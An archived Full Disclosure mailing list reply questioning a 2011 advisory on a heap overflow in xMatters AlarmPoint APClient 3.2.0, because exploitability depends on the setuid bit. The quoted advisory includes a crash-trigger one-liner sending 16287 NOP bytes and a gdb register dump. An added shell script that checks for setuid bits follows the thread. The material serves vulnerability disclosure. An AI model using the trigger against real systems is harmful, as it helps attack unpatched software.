Full Disclosure mailing list archives
Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
From: Mario Vilas <mvilas () gmail com>
Date: Thu, 28 Apr 2011 14:40:22 -0300
Is the suid bit set on that binary? Otherwise, unless I'm missing something, it doesn't seem to be exploitable by an attacker...

On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco <jsacco () insecurityresearch com> wrote:

> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in version APClient 3.2.0 (native).
>
> A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as the POSIX malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
> Exploit as follows:
> Submit a malicious file containing the exploit
> root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'`
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax 0xa303924 170932516
> ecx 0xbfb8 49080
> edx 0xa303924 170932516
> ebx 0x8059438 134583352
> esp 0xbfff3620 0xbfff3620
> ebp 0xbfff3638 0xbfff3638
> esi 0x8059440 134583360
> edi 0x80653f0 134632432
> eip 0x804be8a 0x804be8a <free+126>
> eflags 0x210206 [ PF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
> (gdb)
>
> Solution
> -------------------
> No patches are available at this time.
>
> Credits
> -------------------
> Manually discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released stay tuned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
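The check behind the reply's question, as an added example that is not part of the thread: a shell function that reports whether a binary carries the setuid bit, the setgid bit or Linux file capabilities, which is what decides whether a crash reached through the caller's own arguments crosses a privilege boundary. The function name `priv_boundary`, its output strings and the use of `getcap` (when installed) are assumptions of this example.

```shell
#!/bin/sh
# Added example, not code from the thread.
# priv_boundary PATH
# Prints one line describing the extra privilege the file gets when executed:
#   "setuid uid=N", "setgid gid=N", "capabilities", "none" or "missing".
# Several findings are joined with spaces, e.g. "setuid uid=0 setgid gid=0".
priv_boundary() {
    pb_file=$1
    if [ ! -f "$pb_file" ]; then
        echo "missing"
        return 0
    fi

    # Numeric owner and group are fields 3 and 4 of `ls -ldn`.
    pb_ids=$(ls -ldn -- "$pb_file" | awk '{print $3 " " $4}')
    pb_uid=${pb_ids% *}
    pb_gid=${pb_ids#* }
    pb_out=""

    # -u and -g are the POSIX test operators for the setuid and setgid bits.
    if [ -u "$pb_file" ]; then
        pb_out="setuid uid=$pb_uid"
    fi
    if [ -g "$pb_file" ]; then
        pb_out="${pb_out:+$pb_out }setgid gid=$pb_gid"
    fi

    # File capabilities grant privilege without either mode bit being set.
    if command -v getcap >/dev/null 2>&1; then
        if [ -n "$(getcap "$pb_file" 2>/dev/null)" ]; then
            pb_out="${pb_out:+$pb_out }capabilities"
        fi
    fi

    echo "${pb_out:-none}"
    return 0
}

# Usage: sh priv_boundary.sh /path/to/binary [more paths...]
# The caller's uid is printed for comparison with the reported owner.
for pb_arg in "$@"; do
    printf '%s: %s (caller uid=%s)\n' "$pb_arg" "$(priv_boundary "$pb_arg")" "$(id -u)"
done
```

A result of `none` means the process runs with exactly the invoking user's privileges; it says nothing about other ways the program might receive untrusted input.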